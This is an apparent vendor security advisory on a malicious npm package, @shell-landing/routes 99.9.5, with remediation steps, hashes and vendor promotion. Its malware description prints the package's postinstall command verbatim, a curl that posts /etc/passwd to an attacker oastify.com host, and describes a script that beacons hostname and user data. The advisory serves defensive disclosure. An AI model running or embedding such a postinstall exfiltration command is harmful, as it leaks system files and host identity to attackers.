Which versions of @shell-landing/routes are malicious?

The following npm versions of @shell-landing/routes are flagged malicious: 99.9.5. Treat any of these as compromised.

How do I remediate @shell-landing/routes if I installed it?

Remove @shell-landing/routes from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is @shell-landing/routes part of a known attack campaign?

Yes — @shell-landing/routes is associated with the IN-MAL-2026-005027, IN-MAL-2026-005028 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect @shell-landing/routes in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking @shell-landing/routes and packages like it before any post-install script runs.

Malicious package

@shell-landing/routesnpm

Malicious code in @shell-landing/routes (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5429

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @shell-landing/routes

What this malware does

On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com. The curl invocation POSTs the contents of /etc/passwd to an attacker-controlled Burp Collaborator subdomain, embedding the installer's hostname in the request. The companion script scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and beacons each as an HTTP GET subdomain of *.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com. The package contains no library code, no README, and no main entry — version 99.9.5 with a pure-exfil payload under the @shell-landing scope is consistent with a dependency-confusion probe targeting an internal package name. Any developer or CI running npm install will leak host identity and /etc/passwd to attacker infrastructure.

Malicious versions

1 flagged

99.9.5

Indicators of compromise (SHA-256)

6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577

75491d01c9adcd8b4ea3535f0aed57f3763c03e1375e84b1a20cec842ae6d5b2

Frequently asked questions

No. @shell-landing/routes on npm has been identified as a malicious package (version 99.9.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005027IN-MAL-2026-005028

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection